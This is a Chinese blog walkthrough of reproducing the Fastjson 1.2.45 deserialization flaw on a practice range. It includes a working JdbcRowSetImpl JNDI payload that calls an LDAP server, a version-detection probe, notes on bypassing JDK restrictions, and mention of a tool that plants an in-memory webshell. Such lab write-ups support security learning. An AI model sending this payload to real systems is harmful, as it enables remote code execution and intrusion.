首页 > 其他分享 >Fatsjson1245漏洞复现

Fatsjson1245漏洞复现

时间:2024-01-30 22:57:17浏览次数:39  
标签:Fastjson JDK type 漏洞 Fatsjson1245 复现 版本 com

Fastjson 1245 利用

简介

这是一个利用fastjson 1245 反序列化漏洞的靶场。

漏洞复现

img

点击登录,进入登录页面,进行用户名和密码的输入。在 bp 中就可以发现登录使用的是 json 格式的 post 请求。

发送到 Repeater 中,也可以看到请求头中 Content-Type 为 application/json。

使用{"@type":"java.lang.AutoCloseable"可以探测出版本信息。
img

github 上的一个 fastjson payload 库:https://github.com/safe6Sec/Fastjson

然后直接使用通用 payload:

{{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://localhost:1389/eydNC",
        "autoCommit":true
    }
}}

除了考虑Fastjson版本,还得考虑JDK版本,中间件版本,第三方依赖版本。
JDK版本对于JDNI注入的限制,基于RMI利用的JDK版本<=6u141、7u131、8u121,基于LDAP利用的JDK版本<=6u211、7u201、8u191。(更高版本也有绕过)
这里的JDK版本是 8u342 大于了 8u191 所以需要高版本的绕过方式。

我这里使用的是 JNDIBypass.jar 工具来进行打入一个内存马,因为我这里反弹 shell 一直不行。

img

img

标签:Fastjson,JDK,type,漏洞,Fatsjson1245,复现,版本,com
From: https://www.cnblogs.com/qianyuzz/p/17998152

相关文章

  • Microsoft WindowsWindows Server远程代码执行漏洞
    MicrosoftWindowsWindowsServer远程代码执行漏洞发布时间:2021-11-16浏览次数:285次MicrosoftWindows和MicrosoftWindowsServer都是美国微软(Microsoft)公司的产品。MicrosoftWindows是一套个人设备使用的操作系统。MicrosoftWindowsServer是一套服务器操作系统。一、漏洞......
  • Windows Server 2008 R2修复永恒之蓝漏洞
    一、情况描述服务器安装的WindowsServer2008R2standard系统,通过扫描发现系统存在永恒之蓝漏洞MS17-010(CVE-2017-0143、CVE-2017-0144、CVE-2017-0145、CVE-2017-0146CVE-2017-0147和CVE-2017-0148),需要从微软官网下载KB4012212这个系统补丁进行修复。1、查看漏洞详情2......
  • php网页开发和漏洞寻找
    前言:放寒假了,之前一直在准备期末,没什么时间学技术和写博客,最近有空了会写一些。本篇博客将接着之前的内容介绍利用php搭建博客的一些步骤,从网页开发角度分析一些常用漏洞的产生。学安全首先要会开发1.1操作数据库php作为一门编程语言,是无法直接与数据库进行交互的,想要进行该......
  • 域控漏洞瞎讲
    域控漏洞初探(乱讲)操作半天shell呢?你别弄了,去机房插U盘吧简单记录一下域控漏洞的原理MS14-068原理1.AS通过PAC校验权限2.在AS认证的时候,可以将include-PAC设置为false,得到一个不含pac的tgt3.自己在tgt外加上md5“签名”的pac,将此数据包发送给tgs4.TGS会使用md5验证pac,同时......
  • 文件包含漏洞
    文件包含漏洞文件包含漏洞简介文件包含漏洞基础介绍文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件包含漏洞可能会造成服务器的网页被篡......
  • 【pwn】axb_2019_fmt32 --格式化字符串漏洞进一步利用
    照例检查程序保护情况堆栈不可执行,再导入ida看一下代码逻辑如上图此处代码有格式化字符串漏洞先找出偏移可以发现偏移是8那么我们可以利用printf泄露出libc地址,如何修改printf_got表为system的地址,然后再传入/bin/sh就可以getshellexp:frompwnimport*fromLibcSearc......
  • Spring Boot框架actuator配置不当漏洞
    漏洞描述【安全预警】ApacheDubbo远程代码执行漏洞、SpringBoot配置不当及微软1月补丁漏洞部分网站数据库存在SpringBoot配置不当漏洞,利用网站数据库SpringBoot漏洞可读取Redis数据库用户名和密码。连接数据库可查询掌握运维综合服务平台管理员口令哈希。漏洞等级......
  • 通付盾获2023年移动互联网APP安全漏洞治理优秀案例
    获工信部CAPPVD漏洞库技术支撑单位为深入贯彻落实《网络产品安全漏洞管理规定》,规范移动互联网App产品安全漏洞发现、报告、修补和发布等行为,提升网络产品提供者安全漏洞管理意识,探索最前沿的漏洞挖掘技术发展趋势和创新应用,在上级主管部门指导支持下,1月16日,中国软件评测中心(工业......
  • log4j-漏洞修复
    Log4j漏洞修复修复参考文档:https://www.cert.org.cn/publish/main/9/2021/20211215154225883558274/20211215154225883558274_.html1.log4j是什么ApacheLog4j是一个基于Java的日志记录组件文档:https://logging.apache.org/log4j/2.x/2.log4j漏洞是什么Log4j2组件在......
  • Redis整形溢出漏洞(CVE-2021-32761)及修复脚本
    今天的计划是修复线上的redis漏洞Redis整形溢出漏洞(CVE-2021-32761)及修复脚本目的:修复生产的redis漏洞,主要是整数溢出漏洞,但是过程中发现还有反弹shell漏洞(次要,毕竟需要密码)计划:获取生产的redis版本账号和密码在测试环境搭建反正环境漏洞的研究与证实测试环......